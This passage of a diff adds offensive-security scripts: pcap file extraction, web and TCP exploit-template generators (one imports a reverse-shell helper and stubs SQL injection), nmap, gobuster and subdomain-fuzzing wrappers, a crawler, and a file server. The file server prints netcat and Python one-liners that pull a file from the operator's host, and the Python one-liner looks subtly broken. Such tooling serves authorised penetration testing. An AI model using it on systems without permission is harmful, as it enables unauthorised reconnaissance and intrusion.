                http_buffer += raw(next_packet[TCP].payload)
                prev_seq = next_packet[TCP].seq
            else:
                # the other endpoint is talking: this message is complete
                break

        return HttpPacket.parse(sock_src, http_buffer)

    def _parse_http_packets(self):
        """Group the capture into TCP connections, then pull request/response
        pairs out of each connection in order.  Returns a list of HttpPacket.
        """
        connections = TcpConnections()
        for packet in self._packets:
            if TCP not in packet:
                continue

            ip_hdr = packet[IP]
            tcp_packet = packet[TCP]
            # pure ACKs / handshake segments carry no data worth keeping
            if len(tcp_packet.payload) == 0:
                continue

            sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
            connections.add_packet(sock_src, sock_dst, packet)

        http_packets = []
        for connection in connections:
            packet_iterator = connection.iterator()
            while packet_iterator.has_more():
                # locate the next request line anywhere in the connection
                request = packet_iterator.find_packet(HttpRequest.PATTERN)
                if not request:
                    continue

                packet, match, sock_src = request
                method = match[0].decode()
                file_name = match[1].decode().rsplit("?")[0]
                http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_packets.append(http_request_packet)

                # the matching response must come from the peer endpoint
                other_sock = connection.get_other_sock(sock_src)
                response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
                if not response:
                    continue

                packet, match, sock_src = response
                status_code = match[1].decode()
                http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_response_packet.response_to = http_request_packet
                http_packets.append(http_response_packet)

        return http_packets
|
||||
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("file", help="Path to pcap file to extract files from")
    parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
                        dest="output_dir")
    parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
    parser.add_argument("-e", "--extract", help="Extract files (default)", default=False, action="store_true")
    parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
                        default="101,304,403,404", dest="exclude_codes")
    parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
                        default="", dest="include_codes")
    parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
                        default="", dest="file_extensions")
    parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
                        default="", dest="file_name")
    parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
                        default="", dest="file_path")
    # TODO: ports, ip_addresses...

    args = parser.parse_args()

    filters = [
        lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
    ]

    if args.include_codes:
        filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])

    if args.file_extensions:
        # FIX: was os.path.splitext(p.file_name)[1] — HttpPacket objects have
        # no file_name attribute (AttributeError on first use), and splitext
        # yields ".txt" while the user supplies "txt"; use get_file_path()
        # and strip the leading dot so the comparison can ever succeed.
        filters.append(lambda p: os.path.splitext(p.get_file_path() or "")[1].lstrip(".") in args.file_extensions.split(","))

    if args.file_name:
        # guard against get_file_path() returning None (basename(None) raises)
        filters.append(lambda p: os.path.basename(p.get_file_path() or "") == args.file_name)

    if args.file_path:
        filters.append(lambda p: p.get_file_path() == args.file_path)

    pcap_path = args.file
    if not os.path.isfile(pcap_path):
        print("[-] File not found or not a file:", pcap_path)
        exit(1)

    output_dir = args.output_dir
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir, exist_ok=True)
        if not os.path.isdir(output_dir):
            print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
            exit(2)

    pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
    if args.list and args.extract:
        print("[-] Can only specify one of list or extract, not both")
        exit(3)
    elif args.list:
        pcap_extractor.list()
    else:
        pcap_extractor.extract_all()
|
||||
78
tools/misc/recursive_download.py
Executable file
78
tools/misc/recursive_download.py
Executable file
@@ -0,0 +1,78 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
import argparse
|
||||
import urllib
|
||||
import requests
|
||||
import os
|
||||
import pathlib
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
def download_files(url, root_directory, wordlist, verbose=False):
    """Fetch every path in *wordlist* relative to *url*, mirroring the
    directory layout under *root_directory*.

    Args:
        url: base URL ending in '/'.
        root_directory: local directory to mirror into.
        wordlist: iterable of relative URIs (no leading '/').
        verbose: when True, also report non-200 responses.

    Paths that would resolve outside the root (e.g. via '..') are skipped.
    """
    root_directory = str(pathlib.Path(root_directory).resolve())
    for w in wordlist:
        rel_directory = os.path.dirname(w)
        dest_directory = os.path.join(root_directory, rel_directory)
        resolved = str(pathlib.Path(dest_directory).resolve())
        # FIX: a bare startswith(root) prefix test accepted sibling dirs like
        # "/data-evil" for root "/data"; require exact match or a path
        # component boundary.
        if resolved != root_directory and not resolved.startswith(root_directory + os.sep):
            print("[!] Path outside the root directory:", w)
            continue

        res = requests.get(url + w, verify=False, allow_redirects=False)
        if res.status_code == 200:
            if not os.path.isdir(dest_directory):
                os.makedirs(dest_directory, exist_ok=True)
            with open(os.path.join(root_directory, w), "wb") as f:
                f.write(res.content)
            print(f"[+] {url}{w}: {len(res.content)} Bytes")
        elif verbose:
            print(f"[-] {url}{w}: {res.status_code} {res.reason}")
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        dest="dir",
        help="The destination directory"
    )
    parser.add_argument(
        dest="url",
        help="The URL prefix"
    )
    parser.add_argument(
        dest="wordlist",
        help="The wordlist containing all uris"
    )
    parser.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="Verbose mode",
        default=False
    )

    args = parser.parse_args()

    # normalize the wordlist: strip whitespace and leading slashes, drop empties
    uris = set()
    with open(args.wordlist, "r") as f:
        for line in f:
            w = line.strip()
            while w.startswith("/"):
                w = w[1:]
            if w:
                uris.add(w)

    if len(uris) == 0:
        print("[!] List does not contain any URIs")
        exit()

    dest_directory = args.dir
    if not os.path.isdir(dest_directory):
        # FIX: os.mkdir returns None, so the old "if not os.mkdir(...)"
        # treated a SUCCESSFUL mkdir as failure and always bailed out.
        # Attempt creation, then verify the directory actually exists.
        try:
            os.mkdir(dest_directory)
        except OSError:
            pass
        if not os.path.isdir(dest_directory):
            print("[!] Destination directory does not exist and could not be created")
            exit()

    url = args.url
    if not url.endswith("/"):
        url += "/"

    download_files(url, dest_directory, uris, args.verbose)
|
||||
|
||||
118
tools/misc/tcp_template.py
Normal file
118
tools/misc/tcp_template.py
Normal file
@@ -0,0 +1,118 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import argparse
|
||||
import urllib.parse
|
||||
|
||||
def generate_template(listen_address, listen_port, remote_host, remote_port):
    """Return the source code of a self-contained TCP proxy script.

    The generated script binds (listen_address, listen_port), forwards every
    accepted connection to (remote_host, remote_port), and contains stub
    hooks (Packet.from_data / Packet.pack) for parsing and manipulating the
    traffic in transit.

    :param listen_address: address the generated proxy will bind to
    :param listen_port: port the generated proxy will listen on
    :param remote_host: host the generated proxy forwards traffic to
    :param remote_port: port the generated proxy forwards traffic to
    :return: complete Python source of the proxy as a string
    """

    # we could all need that
    imports = [
        "os",
        "socket",
        "threading"
    ]

    # module -> imported names, rendered as "from <module> import <names>"
    partial_imports = {
        "hackingscripts.utils": ["util"],
        "hackingscripts.utils.packeter": ["Packer", "Parser"]
    }

    # sorted by line length purely for cosmetics of the generated header;
    # (idiom fix: sorted() takes any iterable, the intermediate list() was redundant)
    imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
    imports += "\n" + "\n".join(sorted((f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
    # NOTE: inside the template, {{...}} renders as literal braces in the
    # generated script while {imports} etc. are interpolated here.
    return f"""#!/usr/bin/env python

#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#

{imports}

BUFFER_SIZE = 4096

class Packet:
    def __init__(self):
        pass

    @staticmethod
    def from_data(data):
        packet = Packet()
        parser = Parser(data)
        # TODO: auto-generated method stub
        return packet

    def pack(self):
        buf = Packer()
        # TODO: auto-generated method stub
        return buf.get()

def forward(source, destination):
    try:
        while True:
            data = source.recv(BUFFER_SIZE)
            if not data:
                break

            # TODO: Parse / Manipulate packet
            # packet = Packet.from_data(data)
            # repacked = packet.pack()

            destination.sendall(data)
    except Exception:
        pass
    finally:
        source.close()
        destination.close()

def handle_client(client_socket, remote_host, remote_port):
    try:
        remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote_socket.connect((remote_host, remote_port))
    except Exception as e:
        print(f"Failed to connect to remote: {{e}}")
        client_socket.close()
        return

    # Start bidirectional forwarding
    threading.Thread(target=forward, args=(client_socket, remote_socket), daemon=True).start()
    threading.Thread(target=forward, args=(remote_socket, client_socket), daemon=True).start()

def start_proxy(local_host, local_port, remote_host, remote_port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((local_host, local_port))
    server.listen(100)

    print(f"[*] Forwarding from {{local_host}}:{{local_port}} to {{remote_host}}:{{remote_port}}")

    while True:
        client_socket, addr = server.accept()
        print(f"[+] Connection from {{addr[0]}}:{{addr[1]}}")
        threading.Thread(
            target=handle_client,
            args=(client_socket, remote_host, remote_port),
            daemon=True
        ).start()

if __name__ == "__main__":
    start_proxy({repr(listen_address)}, {listen_port}, {repr(remote_host)}, {remote_port})
"""
|
||||
|
||||
if __name__ == "__main__":

    # CLI: four positional arguments describing the local listener and the
    # remote endpoint; the generated proxy source is written to stdout.
    parser = argparse.ArgumentParser(
        description="Exploit Template for tcp application attacks",
        formatter_class=argparse.RawTextHelpFormatter
    )

    parser.add_argument("la", type=str, help="Listen Address")
    parser.add_argument("lp", type=int, help="Listen Port", choices=range(1,65535+1))
    parser.add_argument("rh", type=str, help="Remote Host")
    parser.add_argument("rp", type=int, help="Remote Port", choices=range(1,65535+1))

    args = parser.parse_args()
    template = generate_template(args.la, args.lp, args.rh, args.rp)
    print(template)
|
||||
53
tools/misc/upload_file.py
Executable file
53
tools/misc/upload_file.py
Executable file
@@ -0,0 +1,53 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import sys
|
||||
import os
|
||||
import argparse
|
||||
|
||||
from hackingscripts.utils import util
|
||||
|
||||
def serve_file(listen_sock, path, forever=False):
    """Accept clients on listen_sock and send them the file at path.

    With forever=False exactly one client is served; with forever=True the
    loop keeps accepting connections. The listening socket is always closed
    on exit, and each client connection is closed after its transfer.
    """
    try:
        keep_serving = True
        while keep_serving:
            print('[ ] Waiting for a connection')
            conn, peer = listen_sock.accept()

            try:
                print('[+] Connection from', peer)

                with open(path, "rb") as fh:
                    payload = fh.read()
                    conn.sendall(payload)

                print("[+] File Transfer succeeded")
            finally:
                # Close the per-client connection even if the transfer failed.
                conn.close()

            keep_serving = forever
    finally:
        listen_sock.close()
|
||||
|
||||
if __name__ == "__main__":

    parser = argparse.ArgumentParser(description="File Transfer using netcat")
    parser.add_argument("--port", type=int, required=False, default=None, help="Listening port")
    parser.add_argument(type=str, dest="path", help="Path to the file you wish to upload")
    args = parser.parse_args()

    path = args.path
    if not os.path.isfile(path):
        print("[-] File not found:", path)
        exit(1)

    # Bind a listening socket via the project helpers; the actual port is
    # taken from listen_sock.getsockname() below (presumably util.open_server
    # picks one when --port is omitted — see hackingscripts.utils.util).
    address = util.get_address()
    listen_sock = util.open_server(address, args.port)
    if not listen_sock:
        exit(1)

    # Print ready-to-paste client commands (netcat and a pure-python one-liner).
    print("[+] Now listening, download file using:")
    print('nc %s %d > %s' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
    print('python -c \'import socket;sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0);sock.connect(("%s",%d));sock.sendall(open("%s","rb").read())\'' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
    print()

    # Serve the file to every connecting client until interrupted.
    serve_file(listen_sock, path, forever=True)
|
||||
209
tools/misc/web_template.py
Executable file
209
tools/misc/web_template.py
Executable file
@@ -0,0 +1,209 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import argparse
|
||||
import urllib.parse
|
||||
|
||||
def generate_template(base_url, features):
    """Generate a Python exploit-script skeleton for a web target.

    :param base_url: target base URL, e.g. "http://example.com"
    :param features: list of feature flags/settings (see available_features
                     in __main__), e.g. ["burp", "sqli", "ip_address=10.0.0.1"]
    :return: complete source code of the generated script as a string
    """

    # we could all need that
    imports = [
        "os", "io", "re", "sys",
        "json", "time", "base64", "requests",
        "subprocess", "urllib.parse"
    ]

    partial_imports = {
        "bs4": ["BeautifulSoup"],
        "hackingscripts.utils": ["util"],
        "hackingscripts.tools.exploits": ["rev_shell"],
        "urllib3.exceptions": ["InsecureRequestWarning"]
    }

    main_code = []
    methods = []

    # BUG FIX: filter(regex-match, features) yields the matching *string*,
    # so indexing it with [1] returned the string's second character, not
    # the regex capture group. Keep the match object instead.
    ip_address_arg = next(filter(None, (re.match(r"ip_address=(.*)", f) for f in features)), None)
    ip_address = "util.get_address()" if not ip_address_arg else "'" + ip_address_arg[1] + "'"

    variables = {
        "IP_ADDRESS": ip_address,
        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
    }

    # Same string-vs-match-object fix as for ip_address above.
    proxy_arg = next(filter(None, (re.match(r"proxy=(.*)", f) for f in features)), None)
    if proxy_arg or "burp" in features:
        proxy_url = "http://127.0.0.1:8080" if not proxy_arg else proxy_arg[1]
        variables["PROXIES"] = json.dumps({"http": proxy_url, "https": proxy_url})
        proxy = """
    if "proxies" not in kwargs:
        kwargs["proxies"] = PROXIES
"""
    else:
        proxy = ""

    if "vhost" in features or "subdomain" in features:
        url_parts = urllib.parse.urlparse(base_url)
        host_name = url_parts.netloc
        variables["HOST_NAME"] = f"'{host_name}' if \"LOCAL\" not in sys.argv else \"127.0.0.1:1337\""
        vhost_param = ", vhost=None"
        full_url = f"f'{url_parts.scheme}://{{vhost}}.{{HOST_NAME}}{{uri}}' if vhost else BASE_URL + uri"
    else:
        vhost_param = ""
        full_url = "BASE_URL + uri"

    # Central request() helper every generated stub routes through.
    methods.insert(0, f"""def request(method, uri{vhost_param}, **kwargs):
    if not uri.startswith("/") and uri != "":
        uri = "/" + uri

    client = requests
    if "session" in kwargs:
        client = kwargs["session"]
        del kwargs["session"]

    if "allow_redirects" not in kwargs:
        kwargs["allow_redirects"] = False

    if "verify" not in kwargs:
        kwargs["verify"] = False
{proxy}
    url = {full_url}
    return client.request(method, url, **kwargs)

""")

    if "register" in features or "account" in features:
        main_code.append("""if not register(USERNAME, PASSWORD):
        exit(1)
    """)
        variables["USERNAME"] = '"Blindhero"'
        variables["PASSWORD"] = '"test1234"'
        methods.append("""
def register(username, password):
    res = request("POST", "/register", data={"username": username, "password": password})
    if res.status_code != 200:
        print("[-] Error registering")
        exit()

    return True
""")

    if "login" in features or "account" in features:
        main_code.append("""session = login(USERNAME, PASSWORD)
    if not session:
        exit(1)
    """)
        variables["USERNAME"] = '"username"'
        variables["PASSWORD"] = '"password"'
        methods.append("""
def login(username, password):
    session = requests.Session()
    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
    if res.status_code != 200:
        print("[-] Error logging in")
        exit()

    return session
""")

    if "sqli" in features:
        partial_imports["hackingscripts.sqli"] = ["MySQLi", "PostgreSQLi", "BlindSQLi", "ReflectedSQLi"]
        methods.append("""
class ReflectedSQLiPoC(MySQLi, ReflectedSQLi):
    def __init__(self):
        # TODO: specify reflected columns with their types
        super().__init__([None, str, int])
    def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
        # TODO: build query and extract columns from response
        return None
""")
        methods.append("""
class BlindSQLiPoC(MySQLi, BlindSQLi):
    def blind_sqli(self, condition: str, verbose=False) -> bool:
        # TODO: build query and evaluate condition
        return False
""")

        main_code.append("""poc = ReflectedSQLiPoC()
    print(poc.get_current_user())
    """)

    if "http-server" in features or "file-server" in features:
        partial_imports["hackingscripts.fileserver"] = ["HttpFileServer"]
        main_code.append("""file_server = HttpFileServer("0.0.0.0", 3000)
    file_server.enableLogging()
    file_server.addRoute("/dynamic", on_request)
    file_server.addFile("/static", b"static-content")
    file_server.startBackground()
    """)

        methods.append("""
def on_request(req):
    # TODO: auto generated method stub
    return 200, b"", { "X-Custom-Header": "1" }
""")

    if len(main_code) == 0:
        main_code = ["pass"]

    # BUG FIX: a backslash inside an f-string expression ({'\n    '.join(...)})
    # is a SyntaxError before Python 3.12; join outside the f-string instead.
    main_body = "\n    ".join(main_code)
    main = f"""
if __name__ == "__main__":
    {main_body}
"""

    imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
    imports += "\n" + "\n".join(sorted((f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
    variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
    header = f"""#!/usr/bin/env python

#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#

{imports}
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

{variables}

"""

    return header + "".join(methods) + main
|
||||
|
||||
if __name__ == "__main__":

    parser = argparse.ArgumentParser(
        description="Exploit Template for web attacks",
        formatter_class=argparse.RawTextHelpFormatter
    )

    # Feature flags understood by generate_template(); "a|b" means either
    # spelling enables the feature, "x=[...]" takes a value.
    available_features = [
        "ip_address=[...]: Local IP-Address for reverse connections",
        "burp|proxy=[...]: Tunnel traffic through a given proxy or Burp defaults",
        "subdomain|vhost: Allow to specify a subdomain for outgoing requests",
        "register|account: Generate an account registration method stub",
        "login|account: Generate an account login method stub",
        "sqli: Generate an template SQL-Injection class",
        "http-server|file-server: Generate code for starting an in-memory http server"
    ]

    parser.add_argument("url", type=str, help="Target URL")
    parser.add_argument(
        "-f",
        "--features",
        nargs="*",
        type=str,
        default=[],
        help="Optional list of features:\n- " + "\n- ".join(available_features)
    )

    args = parser.parse_args()

    # Default to http:// when no scheme was supplied.
    url = args.url
    if "://" not in url:
        url = "http://" + url

    features = args.features
    template = generate_template(url, features)
    print(template)
|
||||
|
||||
136
tools/scanner/crawl_urls.py
Executable file
136
tools/scanner/crawl_urls.py
Executable file
@@ -0,0 +1,136 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import urllib.parse
|
||||
import urllib3
|
||||
import requests
|
||||
import queue
|
||||
import re
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
|
||||
class Crawler:
    """Small same-domain web crawler.

    Starting from a seed URL it follows links found in HTML pages and sorts
    every discovered URL into pages, static resources, or out-of-scope
    (different host) sets.
    """

    def __init__(self, url):
        self.url = url

        # Accept either a bare host name ("example.com") or a full URL;
        # for a bare host, urlparse puts the host into .path.
        parts = urllib.parse.urlparse(url)
        if not parts.scheme and not parts.netloc and parts.path:
            self.domain = parts.path
            self.url = parts._replace(scheme="http", netloc=parts.path, path="").geturl()
            self.scheme = "http"
        else:
            self.domain = parts.netloc
            self.scheme = "http" if not parts.scheme else parts.scheme

        self.user_agent = "WebCrawler/1.0"
        self.cookies = {}
        self.proxy = None

        # crawl state
        self.queue = queue.Queue()        # URLs still to visit
        self.visited = set()              # URLs already fetched
        self.out_of_scope = set()         # links pointing to other hosts
        self.resources = set()            # static assets (images, css, js, ...)
        self.pages = set()                # HTML pages in scope

    def request(self, url):
        """Fetch a single URL with the configured user agent / cookies / proxy."""
        headers = {"User-Agent": self.user_agent}
        kwargs = {"verify": False, "cookies": self.cookies, "headers": headers}
        if self.proxy:
            # BUG FIX: requests expects the keyword "proxies" (plural);
            # passing "proxy" raised TypeError: unexpected keyword argument.
            kwargs["proxies"] = {
                "http": self.proxy,
                "https": self.proxy
            }

        print("requesting:", url)
        return requests.get(url, **kwargs)

    def start(self):
        """Crawl breadth-first from the seed URL until the queue is empty."""
        self.queue.put(self.url)
        while not self.queue.empty():
            url = self.queue.get()
            if url in self.visited:
                continue

            self.visited.add(url)
            res = self.request(url)
            # Only parse HTML responses. BUG FIX: guard against a missing
            # Content-Type header (previously crashed on None.lower()).
            content_type = res.headers.get("Content-Type", "") or ""
            if "text/html" not in [p.strip() for p in content_type.lower().split(";")]:
                continue

            urls = self.collect_urls(res.text)
            for link in urls:
                parts = urllib.parse.urlparse(link)
                if parts.netloc and parts.netloc != self.domain:
                    self.out_of_scope.add(link)
                else:
                    resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js", "svg", "ico"]
                    # urlparse already separates the query string into
                    # parts.query; keep a defensive split in case a raw "?"
                    # survived in the path. (BUG FIX: the old code called the
                    # nonexistent urllib.parse.parse_args here; the parsed
                    # query was never used, so the broken call was dropped.)
                    path = parts.path
                    if "?" in path:
                        path = path[0:path.index("?")]
                    if path.rsplit(".", 1)[-1] in resources_ext:
                        self.resources.add(link)
                    else:
                        self.pages.add(link)
                        # NOTE(review): this rebases relative links onto the
                        # site root rather than the current page — TODO
                        # consider urllib.parse.urljoin for true resolution.
                        self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme, fragment="").geturl())

    @staticmethod
    def collect_urls(page):
        """Extract candidate URLs from src/href/action attributes of common tags."""
        if not isinstance(page, BeautifulSoup):
            page = BeautifulSoup(page, "html.parser")

        urls = set()
        attrs = ["src", "href", "action"]
        tags = ["a", "link", "script", "img", "form"]

        for tag in tags:
            for e in page.find_all(tag):
                for attr in attrs:
                    if e.has_attr(attr):
                        urls.add(e[attr])

        return urls
|
||||
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="The target URI to scan to, e.g. http://example.com:8080/dir/")
    parser.add_argument("--proxy", help="Proxy to connect through") # TODO
    parser.add_argument("--user-agent", help="User-Agent to use")
    parser.add_argument("--cookie", help="Cookies to send", action='append', default=[])
    parser.add_argument('--verbose', '-v', help="Verbose output", action='store_true')

    args = parser.parse_args()

    crawler = Crawler(args.url)
    if args.user_agent:
        crawler.user_agent = args.user_agent
    if args.proxy:
        crawler.proxy = args.proxy

    # BUG FIX: the value group is now quantified *inside* the parentheses;
    # the old ([...])* captured only the final character of the value.
    cookie_pattern = re.compile("^([a-zA-Z0-9.%/+_-]+)=([a-zA-Z0-9.%/+_-]*)$")
    # BUG FIX: iterate the cookies supplied on the command line (args.cookie);
    # the old loop iterated crawler.cookies, which starts empty, so no
    # --cookie argument was ever applied.
    for cookie in args.cookie:
        m = cookie_pattern.match(cookie)
        if not m:
            print("[-] Cookie does not match pattern:", cookie)
            print("[-] You might need to URL-encode it")
            exit()
        # BUG FIX: urllib.parse.unquote was misspelled "unquoute" (AttributeError).
        key, value = (urllib.parse.unquote(m[1]), urllib.parse.unquote(m[2]))
        crawler.cookies[key] = value

    crawler.start()

    # Print the three result buckets collected during the crawl.
    results = {
        "Pages": crawler.pages,
        "Resources": crawler.resources,
        "Out of Scope": crawler.out_of_scope
    }

    for name, values in results.items():
        print(f"=== {name} ===")
        print("\n".join(values))
|
||||
33
tools/scanner/first_scan.sh
Executable file
33
tools/scanner/first_scan.sh
Executable file
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/bash

# Quick initial recon: verify the target answers ping, sweep all 65535 TCP
# ports, then run a service/version scan (-A) against only the open ports.

if [ $# -lt 1 ]; then
    echo "Invalid usage: $0 <host>"
    exit
fi

# Raw-socket scans (nmap -A / SYN) need root.
if [ "$EUID" -ne 0 ]; then
    echo "[-] Script requires root permissions (e.g. nmap scan)"
    exit
fi

IP_ADDRESS=$1

echo "[+] Checking online status…"
ping -c1 -W1 -q "${IP_ADDRESS}" &>/dev/null
# FIX (idiom): capture $? directly instead of status=$(echo $?)
status=$?

if ! [[ $status == 0 ]] ; then
    echo "[-] Target not reachable"
    exit
fi

echo "[+] Scanning for open ports…"
# Keep only the "NNN/tcp ..." result lines and join the port numbers with commas.
PORTS=$(nmap -p- -T4 "${IP_ADDRESS}" | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
if [ -z "${PORTS}" ]; then
    echo "[-] No open ports found"
    exit
fi

echo "[+] Open ports: ${PORTS}"
echo "[+] Performing service scans…"
nmap -A "${IP_ADDRESS}" -p"${PORTS}" -T4 -v
|
||||
13
tools/scanner/gobuster.sh
Executable file
13
tools/scanner/gobuster.sh
Executable file
@@ -0,0 +1,13 @@
|
||||
#!/usr/bin/bash

# Thin wrapper around "gobuster dir": brute-force web content on <host>
# with a large lowercase SecLists wordlist, hiding 403/404 responses and
# skipping TLS verification (-k). Any extra arguments are passed through.

if [ $# -lt 1 ]; then
    echo "Invalid usage: $0 <host>"
    exit
fi

HOST=$1
# (set -x; ...) runs in a subshell so the fully expanded gobuster command
# line is echoed before execution; "${@:2}" forwards additional options.
(set -x; gobuster dir \
    --url="${HOST}" \
    --wordlist="/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words-lowercase.txt" \
    -b "403,404" -k \
    "${@:2}")
|
||||
33
tools/scanner/phpinfo-analyzer.py
Executable file
33
tools/scanner/phpinfo-analyzer.py
Executable file
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
def analyze(soup):
    """Report every phpinfo() directive whose Local Value differs from the Master Value.

    Walks each table in the parsed phpinfo page, keeps only the 3-column
    Directive/Local/Master tables (identified by their header row), and
    prints the rows where the two value cells disagree.
    """
    for table in soup.find_all("table"):
        header_row = table.find("tr", { "class": "h" })
        # Skip tables that are not the 3-column directive tables.
        if header_row is None or len(header_row.find_all("th")) != 3:
            continue

        for row in table.find_all("tr"):
            cells = row.find_all("td")
            if len(cells) == 3:
                directive, local_value, master_value = cells
                if local_value.text != master_value.text:
                    print(f"[+] {directive.text} differs. local={local_value.text} master={master_value.text}")
|
||||
|
||||
if __name__ == "__main__":
    if len(sys.argv) < 2:
        # BUG FIX: the usage string was passed to print() as two separate
        # arguments ("Usage: %s <url>", sys.argv[0]) instead of %-formatting.
        print("Usage: %s <url>" % sys.argv[0])
    else:
        # Fetch the phpinfo() page and diff local vs. master values.
        url = sys.argv[1]
        res = requests.get(url)
        if res.status_code != 200:
            print("[-] Server returned:", res.status_code, res.reason)
        else:
            soup = BeautifulSoup(res.text, "html.parser")
            analyze(soup)
|
||||
57
tools/scanner/subdomainFuzz.sh
Executable file
57
tools/scanner/subdomainFuzz.sh
Executable file
@@ -0,0 +1,57 @@
|
||||
#!/bin/bash

# Virtual-host / subdomain fuzzer: establishes response-size baselines for
# (a) the bare IP, (b) a random non-existent subdomain and (c) the main
# domain, then ffuf-fuzzes Host headers, filtering out those sizes.

if [ $# -lt 1 ]; then
    echo "Invalid usage: $0 <domain>"
    exit
fi

DOMAIN=$1
PROTOCOL="http"

if [[ $DOMAIN = https://* ]]; then
    PROTOCOL="https"
fi

# Strip scheme and any path so only the bare host remains.
DOMAIN=$(echo $DOMAIN | sed -e 's|^[^/]*//||' -e 's|/.*$||')

if [ $# -lt 2 ]; then
    # No IP given: resolve the domain ourselves.
    echo "[ ] Resolving IP-Address…"
    output=$(resolveip $DOMAIN 2>&1)
    status=$(echo $?)
    if ! [[ $status == 0 ]] ; then
        echo "[-] ${output}"
        exit
    fi
    IP_ADDRESS=$(echo $output | head -n 1 | awk '{print $NF}')
    echo "[+] IP-Address: ${IP_ADDRESS}"
else
    IP_ADDRESS=$2
    echo "[+] Using IP-Address: ${IP_ADDRESS}"
fi

# sni <protocol> <host[:port]> — append the default port for the protocol
# when the host has none, producing the "host:port" curl --resolve expects.
function sni () {
    protocol=$1
    sni=$2
    if ! [[ "$sni" =~ ".*:[0-9]+" ]]; then
        if [[ $protocol == "https" ]]; then
            sni="$sni:443"
        else
            sni="$sni:80"
        fi
    fi

    echo $sni
}

# Baseline character counts used later as ffuf size filters.
echo "[ ] Retrieving default site…"
rnd=$(uuidgen)
sni=$(sni ${PROTOCOL} ${rnd}.${DOMAIN})
charcountIpAddress=$(curl -s "${PROTOCOL}://${IP_ADDRESS}" -k -m 5 | wc -m)
charcountNonExistent=$(curl -s "${PROTOCOL}://${rnd}.${DOMAIN}" --resolve "${sni}:${IP_ADDRESS}" -k -m 5 | wc -m)
charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
echo "[ ] Fuzzing…"

# Match all responses (--mc all) but hide the three baseline sizes (--fs)
# and HTTP 400 (--fc); extra CLI args are forwarded to ffuf.
(set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
    -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
    -u "${PROTOCOL}://${DOMAIN}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")
|
||||
145
tools/server/dnsserver.py
Executable file
145
tools/server/dnsserver.py
Executable file
@@ -0,0 +1,145 @@
|
||||
#!/usr/bin/env python
|
||||
# coding=utf-8
|
||||
|
||||
import argparse
|
||||
import datetime
|
||||
import sys
|
||||
import time
|
||||
import threading
|
||||
import traceback
|
||||
import socketserver
|
||||
import struct
|
||||
|
||||
try:
|
||||
